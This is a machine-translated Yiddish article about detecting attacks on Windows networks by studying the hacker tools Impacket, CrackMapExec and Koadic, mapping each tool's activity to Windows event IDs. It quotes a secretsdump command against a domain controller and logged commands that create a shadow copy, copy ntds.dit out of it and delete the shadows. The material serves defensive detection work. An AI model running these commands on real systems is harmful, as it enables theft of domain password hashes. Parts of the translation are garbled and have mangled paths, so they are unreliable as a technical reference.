ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื

ื“ื™ ื ื•ืžืขืจ ืคื•ืŸ ืื ืคืืœืŸ ืื™ืŸ ื“ื™ ืคึฟื™ืจืžืข ืกืขืงื˜ืึธืจ ืื™ื– ื’ืจืึธื•ื™ื ื’ ื™ืขื“ืขืจ ื™ืึธืจ: ืคึฟืึทืจ ื‘ื™ื™ึทืฉืคึผื™ืœ ืื™ืŸ 2017, 13% ืžืขืจ ื™ื™ื ืฆื™ืง ื™ื ืกืึทื“ืึทื ืฅ ื–ืขื ืขืŸ ืจืขืงืึธืจื“ืขื“ ื•ื•ื™ ืื™ืŸ 2016, ืื•ืŸ ืื™ืŸ ื“ื™ ืกื•ืฃ ืคื•ืŸ 2018 - 27% ืžืขืจ ื™ื ืกืึทื“ืึทื ืฅื•ื•ื™ ืื™ืŸ ื“ื™ ืคืจื™ืขืจื“ื™ืงืข ืฆื™ื™ึทื˜. ืึทืจื™ื™ึทื ื’ืขืจืขื›ื ื˜ ื“ื™ ื•ื•ืึธืก ื“ื™ ื”ื•ื™ืคึผื˜ ืึทืจื‘ืขื˜ ื’ืขืฆื™ื™ึทื’ ืื™ื– ื“ื™ Windows ืึธืคึผืขืจื™ื™ื˜ื™ื ื’ ืกื™ืกื˜ืขื. ืื™ืŸ 2017-2018, ื“ื™ APT Dragonfly, APT28, APT MuddyWater ื“ื•ืจื›ื’ืขืคื™ืจื˜ ืื˜ืืงืขืก ืื•ื™ืฃ ืจืขื’ื™ืจื•ื ื’ ืื•ืŸ ืžื™ืœื™ื˜ืขืจื™ืฉืข ืืจื’ืื ื™ื–ืืฆื™ืขืก ืื™ืŸ ืื™ื™ืจืืคืข, ืฆืคื•ืŸ ืืžืขืจื™ืงืข ืื•ืŸ ืกืื•ื“ื™ ืืจืื‘ื™ืข. ืื•ืŸ ืžื™ืจ ื’ืขื•ื•ื™ื™ื ื˜ ื“ืจื™ื™ ืžื›ืฉื™ืจื™ื ืคึฟืึทืจ ื“ืขื - ื™ืžืคึผืึทืงืึทื˜, ืงืจืึทืงืงืžืึทืคึผืขืงืกืขืง ะธ ืงืึธืึทื“ื™ืง. ื–ื™ื™ืขืจ ืžืงื•ืจ ืงืึธื“ ืื™ื– ืึธืคืŸ ืื•ืŸ ื‘ื ื™ืžืฆื ืื•ื™ืฃ GitHub.

ืขืก ืื™ื– ื›ื“ืื™ ืฆื• ื‘ืืžืขืจืงืŸ ืึทื– ื“ื™ ืžื›ืฉื™ืจื™ื ื–ืขื ืขืŸ ื ื™ืฉื˜ ื’ืขื ื™ืฆื˜ ืคึฟืึทืจ ืขืจืฉื˜ ื“ื•ืจื›ื“ืจื•ื ื’, ืึธื‘ืขืจ ืฆื• ืึทื ื˜ื•ื•ื™ืงืœืขืŸ ืึท ื‘ืึทืคืึทืœืŸ ืื™ืŸ ื“ื™ ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ. ืึทื˜ืึทืงืขืจื– ื ื•ืฆืŸ ื–ื™ื™ ืื™ืŸ ืคืึทืจืฉื™ื“ืขื ืข ืกื˜ืึทื’ืขืก ืคื•ืŸ ื“ื™ ื‘ืึทืคืึทืœืŸ ื ืึธืš ื“ื™ ื“ื•ืจื›ื“ืจื•ื ื’ ืคื•ืŸ ื“ื™ ืคึผืขืจื™ืžืขื˜ืขืจ. ื“ืขื, ื“ื•ืจืš ื“ืขื ื•ื•ืขื’, ืื™ื– ืฉื•ื•ืขืจ ืฆื• ื“ืขื˜ืขืงื˜ ืื•ืŸ ืึธืคื˜ ื‘ืœื•ื™ื– ืžื™ื˜ ื“ื™ ื”ื™ืœืฃ ืคื•ืŸ ื˜ืขื›ื ืึธืœืึธื’ื™ืข ื™ื“ืขื ื˜ื™ืคื™ืฆื™ืจืŸ ื˜ืจืึทืกืขืก ืคื•ืŸ ืงืึธืžืคึผืจืึธืžื™ืก ืื™ืŸ ื ืขืฅ ืคืึทืจืงืขืจ ืึธื“ืขืจ ืžื›ืฉื™ืจื™ื ื•ื•ืึธืก ืœืึธื–ืŸ ื“ืขื˜ืขืงื˜ ืึทืงื˜ื™ื•ื• ืึทืงืฉืึทื ื– ืคื•ืŸ ืึท ืึทื˜ืึทืงืขืจ ื ืึธืš ืขืจ ืื™ื– ื“ื•ืจื›ื’ืขื’ืื ื’ืขืŸ ื“ื™ ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ. ื“ื™ ืžื›ืฉื™ืจื™ื ืฆื•ืฉื˜ืขืœืŸ ืึท ืคืึทืจืฉื™ื™ื“ื ืงื™ื™ึทื˜ ืคื•ืŸ ืคืึทื ื’ืงืฉืึทื ื–, ืคึฟื•ืŸ ื˜ืจืึทื ืกืคืขืจื™ื ื’ ื˜ืขืงืขืก ืฆื• ื™ื ื˜ืขืจืึทืงื˜ื™ื ื’ ืžื™ื˜ ื“ื™ ืจืขื’ื™ืกื˜ืจื™ ืื•ืŸ ืขืงืกืึทืงื™ื•ื˜ื™ื ื’ ืงืึทืžืึทื ื“ื– ืื•ื™ืฃ ืึท ื•ื•ื™ื™ึทื˜ ืžืึทืฉื™ืŸ. ืžื™ืจ ื’ืขืคื™ืจื˜ ืึท ืœืขืจื ืขืŸ ืคื•ืŸ ื“ื™ ืžื›ืฉื™ืจื™ื ืฆื• ื‘ืึทืฉืœื™ืกืŸ ื–ื™ื™ืขืจ ื ืขืฅ ื˜ืขื˜ื™ืงื™ื™ื˜.

ื•ื•ืึธืก ืžื™ืจ ื“ืึทืจืคึฟืŸ ืฆื• ื˜ืึธืŸ:

  • ืคึฟืึทืจืฉื˜ื™ื™ืŸ ื•ื•ื™ ื›ืึทืงื™ื ื’ ืžื›ืฉื™ืจื™ื ืึทืจื‘ืขื˜. ื’ืขืคึฟื™ื ืขืŸ ื–ื™ืš ื•ื•ืึธืก ืึทื˜ืึทืงืขืจื– ื“ืึทืจืคึฟืŸ ืฆื• ื ื•ืฆืŸ ืื•ืŸ ื•ื•ืึธืก ื˜ืขืงื ืึทืœืึทื“ื–ืฉื™ื– ื–ื™ื™ ืงืขื ืขืŸ ื ื•ืฆืŸ.
  • ื’ืขืคึฟื™ื ืขืŸ ื•ื•ืึธืก ืื™ื– ื ื™ืฉื˜ ื“ื™ื˜ืขืงื˜ืึทื“ ื“ื•ืจืš ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข ื–ื™ื›ืขืจื”ื™ื™ื˜ ืžื›ืฉื™ืจื™ื ืื™ืŸ ื“ืขืจ ืขืจืฉื˜ืขืจ ืกื˜ืึทื’ืขืก ืคื•ืŸ ืึท ื‘ืึทืคืึทืœืŸ. ื“ื™ ืจื™ืงืึทื ืึทืกืึทื ืก ืคืึทืกืข ืงืขืŸ ื–ื™ื™ืŸ ืกืงื™ืคึผื˜, ืึธื“ืขืจ ื•ื•ื™ื™ึทืœ ื“ืขืจ ืึทื˜ืึทืงืขืจ ืื™ื– ืึทืŸ ื™ื ืขืจืœืขืš ืึทื˜ืึทืงืขืจ, ืึธื“ืขืจ ื•ื•ื™ื™ึทืœ ื“ืขืจ ืึทื˜ืึทืงืขืจ ืื™ื– ืขืงืกืคึผืœื•ื™ื˜ื™ื ื’ ืึท ืœืึธืš ืื™ืŸ ื“ื™ ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ ื•ื•ืึธืก ืื™ื– ื’ืขื•ื•ืขืŸ ื ื™ืฉื˜ ื‘ืืงืื ื˜ ื‘ื™ื– ืึทื”ืขืจ. ืขืก ื•ื•ืขืจื˜ ืžืขื’ืœืขืš ืฆื• ื•ืžืงืขืจืŸ ื“ื™ ื’ืื ืฆืข ืงื™ื™ื˜ ืคื•ืŸ ื–ื™ื™ืŸ ืึทืงืฉืึทื ื–, ื“ืขืจืคืืจ ื“ืขืจ ืคืึทืจืœืึทื ื’ ืฆื• ื“ืขื˜ืขืงื˜ ื•ื•ื™ื™ึทื˜ืขืจ ื‘ืึทื•ื•ืขื’ื•ื ื’.
  • ืขืœื™ืžื™ื ื™ืจืŸ ืคืึทืœืฉ ืคึผืึทื–ืึทื˜ื™ื•ื•ื– ืคื•ืŸ ื™ื ื˜ืจื•ื–ืฉืึทืŸ ื“ื™ื˜ืขืงืฉืึทืŸ ืžื›ืฉื™ืจื™ื. ืžื™ ืจ ื˜ืืจ ืŸ ื ื™ืฉ ื˜ ืคืืจื’ืขื ืŸ ื ื– ืฐืข ืŸ ืข ืก ืฐืขืจ ืŸ ืื ื˜ื“ืขืง ื˜ ื’ืขืฐื™ืก ืข ืืงืฆื™ืขืก , ืื•ื™ ืฃ ื“ืข ืจ ื‘ืื–ืข , ืืœืฒืŸ , ื–ืฒื ืข ืŸ ืืคื˜ ืข ื˜ืขื•ืชื™ื . ื™ื•ื–ืฉืึทื•ื•ืึทืœื™ ืื™ืŸ ื“ื™ ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ ืขืก ื–ืขื ืขืŸ ืึท ื’ืขื ื•ื’ ื ื•ืžืขืจ ืคื•ืŸ ื•ื•ืขื’ืŸ ืฆื• ื‘ืึทืงื•ืžืขืŸ ืงื™ื™ืŸ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข, ื•ื•ืึธืก ืื™ื– ื ื™ื˜ ืึทื ื“ืขืจืฉ ืคื•ืŸ ืœืึทื“ื–ืฉื™ื˜ืึทืžืึทื˜ ืึธื ืขืก ืื™ืŸ ืขืจืฉื˜ืขืจ ื‘ืœื™ืง.

ื•ื•ืึธืก ื˜ืึธืŸ ื“ื™ ืžื›ืฉื™ืจื™ื ื’ืขื‘ืŸ ืึทื˜ืึทืงืขืจื–? ืื•ื™ื‘ ื“ืึธืก ืื™ื– ื™ืžืคึผืึทืงืงืขื˜, ืึทื˜ืึทืงืขืจื– ื‘ืึทืงื•ืžืขืŸ ืึท ื’ืจื•ื™ืก ื‘ื™ื‘ืœื™ืึธื˜ืขืง ืคื•ืŸ ืžืึทื“ื–ืฉื•ืœื– ื•ื•ืึธืก ืงืขื ืขืŸ ื–ื™ื™ืŸ ื’ืขื•ื•ื™ื™ื ื˜ ืื™ืŸ ืคืึทืจืฉื™ื“ืขื ืข ืกื˜ืึทื’ืขืก ืคื•ืŸ ื“ื™ ื‘ืึทืคืึทืœืŸ ื ืึธืš ื‘ืจื™ื™ืงื™ื ื’ ื“ื™ ืคึผืขืจื™ืžืขื˜ืขืจ. ืคื™ืœืข ืžื›ืฉื™ืจื™ื ื ื•ืฆืŸ ื™ืžืคึผืึทืงืงืขื˜ ืžืึทื“ื–ืฉื•ืœื– ื™ื ืขื•ื•ื™ื™ื ื™ืง - ืคึฟืึทืจ ื‘ื™ื™ึทืฉืคึผื™ืœ, Metasploit. ืขืก ื”ืื˜ ื“ืงืึธืžืขืงืกืขืง ืื•ืŸ ื•ื•ืžื™ืขืงืกืขืง ืคึฟืึทืจ ื•ื•ื™ื™ึทื˜ ื‘ืึทืคึฟืขืœืŸ ื“ื•ืจื›ืคื™ืจื•ื ื’, ืกืขืงืจืขื˜ืกื“ื•ืžืคึผ ืคึฟืึทืจ ื‘ืึทืงื•ืžืขืŸ ืึทืงืึทื•ื ืฅ ืคื•ืŸ ื–ื›ึผืจื•ืŸ ื•ื•ืึธืก ื–ืขื ืขืŸ ืฆื•ื’ืขื’ืขื‘ืŸ ืคึฟื•ืŸ ื™ืžืคึผืึทืงืงืขื˜. ื•ื•ื™ ืึท ืจืขื–ื•ืœื˜ืึทื˜, ืจื™ื›ื˜ื™ืง ื“ื™ื˜ืขืงืฉืึทืŸ ืคื•ืŸ ื“ื™ ื˜ืขื˜ื™ืงื™ื™ื˜ ืคื•ืŸ ืึทื–ืึท ืึท ื‘ื™ื‘ืœื™ืึธื˜ืขืง ื•ื•ืขื˜ ืขื ืฉื•ืจ ื“ื™ ื“ื™ื˜ืขืงืฉืึทืŸ ืคื•ืŸ ื“ืขืจื™ื•ื•ืึทื˜ื™ื•ื•ื–.

ืขืก ืื™ื– ืงื™ื™ืŸ ืฆื•ืคืึทืœ ืึทื– ื“ื™ ืงืจื™ื™ื™ื˜ืขืจื– ื’ืขืฉืจื™ื‘ืŸ "Powered by Impacket" ื•ื•ืขื’ืŸ CrackMapExec (ืึธื“ืขืจ ืคืฉื•ื˜ CME). ืื™ืŸ ืึทื“ื™ืฉืึทืŸ, CME ื”ืื˜ ืคืึทืจื˜ื™ืง ืคืึทื ื’ืงืฉืึทื ืึทืœื™ื˜ื™ ืคึฟืึทืจ ืคืึธืœืงืก ืกื™ื ืขืจื™ืึธื•ื–: Mimikatz ืคึฟืึทืจ ื‘ืืงื•ืžืขืŸ ืคึผืึทืกื•ื•ืขืจื“ื– ืึธื“ืขืจ ื–ื™ื™ืขืจ ื”ืึทืฉืขืก, ื™ืžืคึผืœืึทืžืขื ื˜ื™ื™ืฉืึทืŸ ืคื•ืŸ Meterpreter ืึธื“ืขืจ ืื™ืžืคืขืจื™ืข ืึทื’ืขื ื˜ ืคึฟืึทืจ ื•ื•ื™ื™ึทื˜ ื“ื•ืจื›ืคื™ืจื•ื ื’, ืื•ืŸ Bloodhound ืื•ื™ืฃ ื‘ืจืขื˜.

ื“ื™ ื“ืจื™ื˜ ื’ืขืฆื™ื™ึทื’ ื•ื•ืึธืก ืžื™ืจ ืื•ื™ืกื“ืขืจื•ื•ื™ื™ืœื˜ ืื™ื– ื’ืขื•ื•ืขืŸ Koadic. ืขืก ืื™ื– ื’ืึทื ืฅ ืคืจื™ืฉ, ืขืก ืื™ื– ื’ืขื•ื•ืขืŸ ื“ืขืจืœืื ื’ื˜ ืื™ืŸ ื“ืขืจ ืื™ื ื˜ืขืจื ืึทืฆื™ืึธื ืึทืœืขืจ ื”ืขืงืขืจ ื–ื™ืฆื•ื ื’ DEFCON 25 ืื™ืŸ 2017 ืื•ืŸ ืื™ื– ืื•ื ื˜ืขืจืฉื™ื™ื“ืŸ ื“ื•ืจืš ืึท ื ื™ื˜-ื ืึธืจืžืึทืœ ืฆื•ื’ืึทื ื’: ืขืก ืึทืจื‘ืขื˜ ื“ื•ืจืš ื”ื˜ื˜ืคึผ, ื–'ืื‘ื ืกืงืจื™ืคึผื˜ ืื•ืŸ Microsoft Visual Basic Script (VBS). ื“ืขืจ ืฆื•ื’ืึทื ื’ ืื™ื– ื’ืขืจื•ืคืŸ ืœืขื‘ืขื“ื™ืง ืึทื•ื•ืขืง ื“ื™ ืขืจื“: ื“ื™ ื’ืขืฆื™ื™ึทื’ ื ื™ืฆื˜ ืึท ืกื›ื•ื ืคื•ืŸ ื“ื™ืคึผืขื ื“ืึทื ืกื™ื– ืื•ืŸ ืœื™ื™ื‘ืจืขืจื™ื– ื’ืขื‘ื•ื™ื˜ ืื™ืŸ Windows. ื“ื™ ืงืจื™ื™ื™ื˜ืขืจื– ืจื•ืคืŸ ืขืก COM Command & Control, ืึธื“ืขืจ C3.

IMPACKET

ื“ื™ ืคืึทื ื’ืงืฉืึทื ืึทืœื™ื˜ื™ ืคื•ืŸ Impacket ืื™ื– ื–ื™ื™ืขืจ ื‘ืจื™ื™ื˜, ืจื™ื™ื ื“ื–ืฉื™ื ื’ ืคื•ืŸ ืจื™ืงืึทื ืึทืกืึทื ืก ืื™ืŸ AD ืื•ืŸ ืงืึทืœืขืงื˜ื™ื ื’ ื“ืึทื˜ืŸ ืคื•ืŸ ื™ื ืขืจืœืขืš MS SQL ืกืขืจื•ื•ืขืจืก, ืฆื• ื˜ืขืงื ื™ืงืก ืคึฟืึทืจ ืงืจื™ื™ื™ื˜ื™ื ื’ ืงืจืึทื“ืขื ื˜ืฉืึทืœื–: ื“ืึธืก ืื™ื– ืึท SMB ืจืขืœืข ื‘ืึทืคืึทืœืŸ ืื•ืŸ ื‘ืึทืงื•ืžืขืŸ ื“ื™ ntds.dit ื˜ืขืงืข ืžื™ื˜ ื”ืึทืฉืขืก ืคื•ืŸ ื‘ืึทื ื™ืฆืขืจ ืคึผืึทืกื•ื•ืขืจื“ื– ืคึฟื•ืŸ ืึท ืคืขืœื“ ืงืึธื ื˜ืจืึธืœืœืขืจ. ื™ืžืคึผืึทืงืงืขื˜ ืื•ื™ืš ืขืงืกืึทืงื™ื•ืฅ ืงืึทืžืึทื ื“ื– ืจื™ืžืึธื•ื˜ืœื™ ื ื™ืฆืŸ ืคื™ืจ ืคืึทืจืฉื™ื“ืขื ืข ืžืขื˜ื”ืึธื“ืก: WMI, Windows Scheduler Management Service, DCOM ืื•ืŸ SMB, ืื•ืŸ ืจื™ืงื•ื•ื™ื™ืขืจื– ืงืจืึทื“ืขื ื˜ืฉืึทืœื– ืฆื• ื˜ืึธืŸ ื“ืึธืก.

ืกืขืงืจืขื˜ืกื“ื•ืžืคึผ

ื–ืืœ ืก ื ืขืžืขืŸ ืึท ืงื•ืง ื‘ื™ื™ึท secretsdump. ื“ืึธืก ืื™ื– ืึท ืžืึธื“ื•ืœืข ื•ื•ืึธืก ืงืขื ืขืŸ ืฆื™ืœ ื‘ื™ื™ื“ืข ื‘ืึทื ื™ืฆืขืจ ืžืืฉื™ื ืขืŸ ืื•ืŸ ืคืขืœื“ ืงืึทื ื˜ืจืึธื•ืœืขืจื–. ืขืก ืงืขื ืขืŸ ื–ื™ื™ืŸ ื’ืขื•ื•ื™ื™ื ื˜ ืฆื• ื‘ืึทืงื•ืžืขืŸ ืงืึธืคึผื™ืขืก ืคื•ืŸ ื–ื›ึผืจื•ืŸ ื’ืขื‘ื™ื˜ืŸ LSA, SAM, SECURITY, NTDS.dit, ืึทื–ื•ื™ ืขืก ืงืขื ืขืŸ ื–ื™ื™ืŸ ื’ืขื–ืขืŸ ืื™ืŸ ืคืึทืจืฉื™ื“ืขื ืข ืกื˜ืึทื’ืขืก ืคื•ืŸ ื“ื™ ื‘ืึทืคืึทืœืŸ. ื“ืขืจ ืขืจืฉื˜ืขืจ ืฉืจื™ื˜ ืื™ืŸ ื“ื™ ืึธืคึผืขืจืึทืฆื™ืข ืคื•ืŸ โ€‹โ€‹ื“ื™ ืžืึธื“ื•ืœืข ืื™ื– ืึธื˜ืขื ื˜ืึทืงื™ื™ืฉืึทืŸ ื“ื•ืจืš SMB, ื•ื•ืึธืก ืจื™ืงื•ื•ื™ื™ืขืจื– ืึธื“ืขืจ ื“ื™ ืคึผืึทืจืึธืœ ืคื•ืŸ ื“ื™ ื‘ืึทื ื™ืฆืขืจ ืึธื“ืขืจ ื–ื™ื™ืŸ ื”ืึทืฉ ืฆื• ืื•ื™ื˜ืึธืžืึทื˜ื™ืฉ ื“ื•ืจื›ืคื™ืจืŸ ื“ื™ ืคืึธืจืŸ ื“ื™ ื”ืึทืฉ ื‘ืึทืคืึทืœืŸ. ื“ืขืจื ืึธืš ืงื•ืžื˜ ืึท ื‘ืงืฉื” ืฆื• ืขืคึฟืขื ืขืŸ ืึทืงืกืขืก ืฆื• ืกืขืจื•ื•ื™ืก ืงืึธื ื˜ืจืึธืœ ืžืึทื ืึทื’ืขืจ (SCM) ืื•ืŸ ื‘ืึทืงื•ืžืขืŸ ืึทืงืกืขืก ืฆื• ื“ื™ ืจืขื’ื™ืกื˜ืจื™ ื“ื•ืจืš ื“ื™ ื•ื•ื™ื ืจืขื’ ืคึผืจืึธื˜ืึธืงืึธืœ, ืžื™ื˜ ื•ื•ืึธืก ืึท ืึทื˜ืึทืงืขืจ ืงืขื ืขืŸ ื’ืขืคึฟื™ื ืขืŸ ื“ื™ ื“ืึทื˜ืŸ ืคื•ืŸ ืื™ื ื˜ืขืจืขืกืŸ ืฆื•ื•ื™ื™ื’ืŸ ืื•ืŸ ื‘ืึทืงื•ืžืขืŸ ืจืขื–ื•ืœื˜ืึทื˜ืŸ ื“ื•ืจืš SMB.

ืื™ืŸ Fig. 1 ืžื™ืจ ื–ืขืŸ ื•ื•ื™ ืคึผื•ื ืงื˜ ื•ื•ืขืŸ ื ื™ืฆืŸ ื“ื™ ื•ื•ื™ื ืจืขื’ ืคึผืจืึธื˜ืึธืงืึธืœ, ืึทืงืกืขืก ืื™ื– ื‘ืืงื•ืžืขืŸ ืžื™ื˜ ืึท ืจืขื’ื™ืกื˜ืจื™ ืฉืœื™ืกืœ ืžื™ื˜ ืึท ืœืกืึท. ืฆื• ื˜ืึธืŸ ื“ืึธืก, ื ื•ืฆืŸ ื“ื™ DCERPC ื‘ืึทืคึฟืขืœ ืžื™ื˜ ืึธืคึผืงืึธื“ืข 15 - OpenKey.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 1. ืขืคืŸ ืึท ืจืขื’ื™ืกื˜ืจื™ ืฉืœื™ืกืœ ื ื™ืฆืŸ ื“ื™ ื•ื•ื™ื ืจืขื’ ืคึผืจืึธื˜ืึธืงืึธืœ

ื“ืขืจื ืึธืš, ื•ื•ืขืŸ ืึทืงืกืขืก ืฆื• ื“ื™ ืฉืœื™ืกืœ ืื™ื– ื‘ืืงื•ืžืขืŸ, ื“ื™ ื•ื•ืึทืœื•ืขืก ื–ืขื ืขืŸ ื’ืขืจืื˜ืขื•ื•ืขื˜ ืžื™ื˜ ื“ื™ SaveKey ื‘ืึทืคึฟืขืœ ืžื™ื˜ ืึธืคึผืงืึธื“ืข 20. Impacket ื˜ื•ื˜ ื“ืึธืก ืื•ื™ืฃ ืึท ื–ื™ื™ืขืจ ืกืคึผืขืฆื™ืคื™ืฉ ื•ื•ืขื’. ืขืก ืกืึทื•ื•ืขืก ื“ื™ ื•ื•ืึทืœื•ืขืก ืฆื• ืึท ื˜ืขืงืข ื•ื•ืขืžืขื ืก ื ืึธืžืขืŸ ืื™ื– ืึท ืฉื˜ืจื™ืงืœ ืคื•ืŸ 8 ื˜ืจืึทืค ืื•ืชื™ื•ืช ืึทืคึผืคึผืขื ื“ืขื“ ืžื™ื˜ .ื˜ืžืคึผ. ืื™ืŸ ืึทื“ื™ืฉืึทืŸ, ื•ื•ื™ื™ึทื˜ืขืจ ื•ืคึผืœืึธืึทื“ ืคื•ืŸ ื“ืขื ื˜ืขืงืข ืึทืงืขืจื– ื“ื•ืจืš ืกืžื‘ ืคื•ืŸ ื“ื™ ืกื™ืกื˜ืขื32 ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ (ืคื™ื’ื•ืจืข 2).

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 2. ืกื›ืขืžืข ืคึฟืึทืจ ื‘ืืงื•ืžืขืŸ ืึท ืจืขื’ื™ืกื˜ืจื™ ืฉืœื™ืกืœ ืคื•ืŸ ืึท ื•ื•ื™ื™ึทื˜ ืžืึทืฉื™ืŸ

ืขืก ื˜ื•ืจื ืก ืื•ื™ืก ืึทื– ืึทื–ืึท ื˜ืขื˜ื™ืงื™ื™ื˜ ืื•ื™ืฃ ื“ื™ ื ืขืฅ ืงืขื ืขืŸ ื–ื™ื™ืŸ ื“ื™ื˜ืขืงื˜ืึทื“ ื“ื•ืจืš ืคึฟืจืื’ืŸ ืฆื• ื–ื™ื›ืขืจ ืจืขื’ื™ืกื˜ืจื™ ืฆื•ื•ื™ื™ื’ืŸ ื ื™ืฆืŸ ื•ื•ื™ื ืจืขื’ ืคึผืจืึธื˜ืึธืงืึธืœ, ืกืคึผืขืฆื™ืคื™ืฉ ื ืขืžืขืŸ, ืงืึทืžืึทื ื“ื– ืื•ืŸ ื–ื™ื™ืขืจ ืกื“ืจ.

ื“ืขืจ ืžืึธื“ื•ืœืข ืื•ื™ืš ืœืึธื–ืŸ ื˜ืจืึทืกืขืก ืื™ืŸ ื“ื™ Windows ื’ืขืฉืขืขื ื™ืฉ ืงืœืึธืฅ, ื•ื•ืึธืก ืžืื›ื˜ ืขืก ื’ืจื™ื ื’ ืฆื• ื“ืขื˜ืขืงื˜. ืคึฟืึทืจ ื‘ื™ื™ึทืฉืคึผื™ืœ, ื•ื•ื™ ืึท ืจืขื–ื•ืœื˜ืึทื˜ ืคื•ืŸ ืขืงืกืึทืงื™ื•ื˜ื™ื ื’ ื“ื™ ื‘ืึทืคึฟืขืœ

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

ืื™ืŸ ื“ื™ Windows Server 2016 ืงืœืึธืฅ ืžื™ืจ ื•ื•ืขืœืŸ ื–ืขืŸ ื“ื™ ืคืืœื’ืขื ื“ืข ืฉืœื™ืกืœ ืกื™ืงื•ื•ืึทื ืก ืคื•ืŸ ื’ืขืฉืขืขื ื™ืฉืŸ:

1. 4624 - ื•ื•ื™ื™ึทื˜ ืœืึธื’ืึธืŸ.
2. 5145 - ืงืึธื ื˜ืจืึธืœื™ืจื•ื ื’ ืึทืงืกืขืก ืจืขื›ื˜ ืฆื• ื“ื™ ื•ื•ื™ื ืจืขื’ ื•ื•ื™ื™ึทื˜ ื“ื™ื ืกื˜.
3. 5145 - ืงืึธื ื˜ืจืึธืœื™ืจื•ื ื’ ื˜ืขืงืข ืึทืงืกืขืก ืจืขื›ื˜ ืื™ืŸ ื“ื™ ืกื™ืกื˜ืขื32 ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ. ื“ืขืจ ื˜ืขืงืข ื”ืื˜ ื“ื™ ืจืึทื ื“ืึธื ื ืึธืžืขืŸ ื“ืขืจืžืื ื˜ ืื•ื™ื‘ืŸ.
4. 4688 - ืงืจื™ื™ื™ื˜ื™ื ื’ ืึท cmd.exe ืคึผืจืึธืฆืขืก ื•ื•ืึธืก ืœืึธื ื˜ืฉื™ื– vssadmin:

โ€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ืงืจื™ื™ื™ื˜ื™ื ื’ ืึท ืคึผืจืึธืฆืขืก ืžื™ื˜ ื“ื™ ื‘ืึทืคึฟืขืœ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ืงืจื™ื™ื™ื˜ื™ื ื’ ืึท ืคึผืจืึธืฆืขืก ืžื™ื˜ ื“ื™ ื‘ืึทืคึฟืขืœ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ืงืจื™ื™ื™ื˜ื™ื ื’ ืึท ืคึผืจืึธืฆืขืก ืžื™ื˜ ื“ื™ ื‘ืึทืคึฟืขืœ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

ืกืžื‘ืขืงืกืขืง

ื•ื•ื™ ืคื™ืœืข ืคึผืึธืกื˜-ืขืงืกืคึผืœืึธื™ื˜ืึทื˜ื™ืึธืŸ ืžื›ืฉื™ืจื™ื, Impacket ื”ืื˜ ืžืึทื“ื–ืฉื•ืœื– ืคึฟืึทืจ ืจื™ืžืึธื•ื˜ืœื™ ืขืงืกืึทืงื™ื•ื˜ื™ื ื’ ืงืึทืžืึทื ื“ื–. ืžื™ืจ ื•ื•ืขืœืŸ ืคืึธืงื•ืก ืื•ื™ืฃ smbexec, ื•ื•ืึธืก ื’ื™ื˜ ืึทืŸ ื™ื ื˜ืขืจืึทืงื˜ื™ื•ื• ื‘ืึทืคึฟืขืœืŸ ืฉืึธืœ ืื•ื™ืฃ ืึท ื•ื•ื™ื™ึทื˜ ืžืึทืฉื™ืŸ. ื“ืขืจ ืžืึธื“ื•ืœืข ืื•ื™ืš ืจื™ืงื•ื•ื™ื™ืขืจื– ืึธื˜ืขื ื˜ืึทืงื™ื™ืฉืึทืŸ ื“ื•ืจืš SMB, ืึธื“ืขืจ ืžื™ื˜ ืึท ืคึผืึทืจืึธืœ ืึธื“ืขืจ ืึท ืคึผืึทืจืึธืœ ื”ืึทืฉ. ืื™ืŸ Fig. ืื™ืŸ ืคื™ื’ื•ืจืข 3 ืžื™ืจ ื–ืขืŸ ืึท 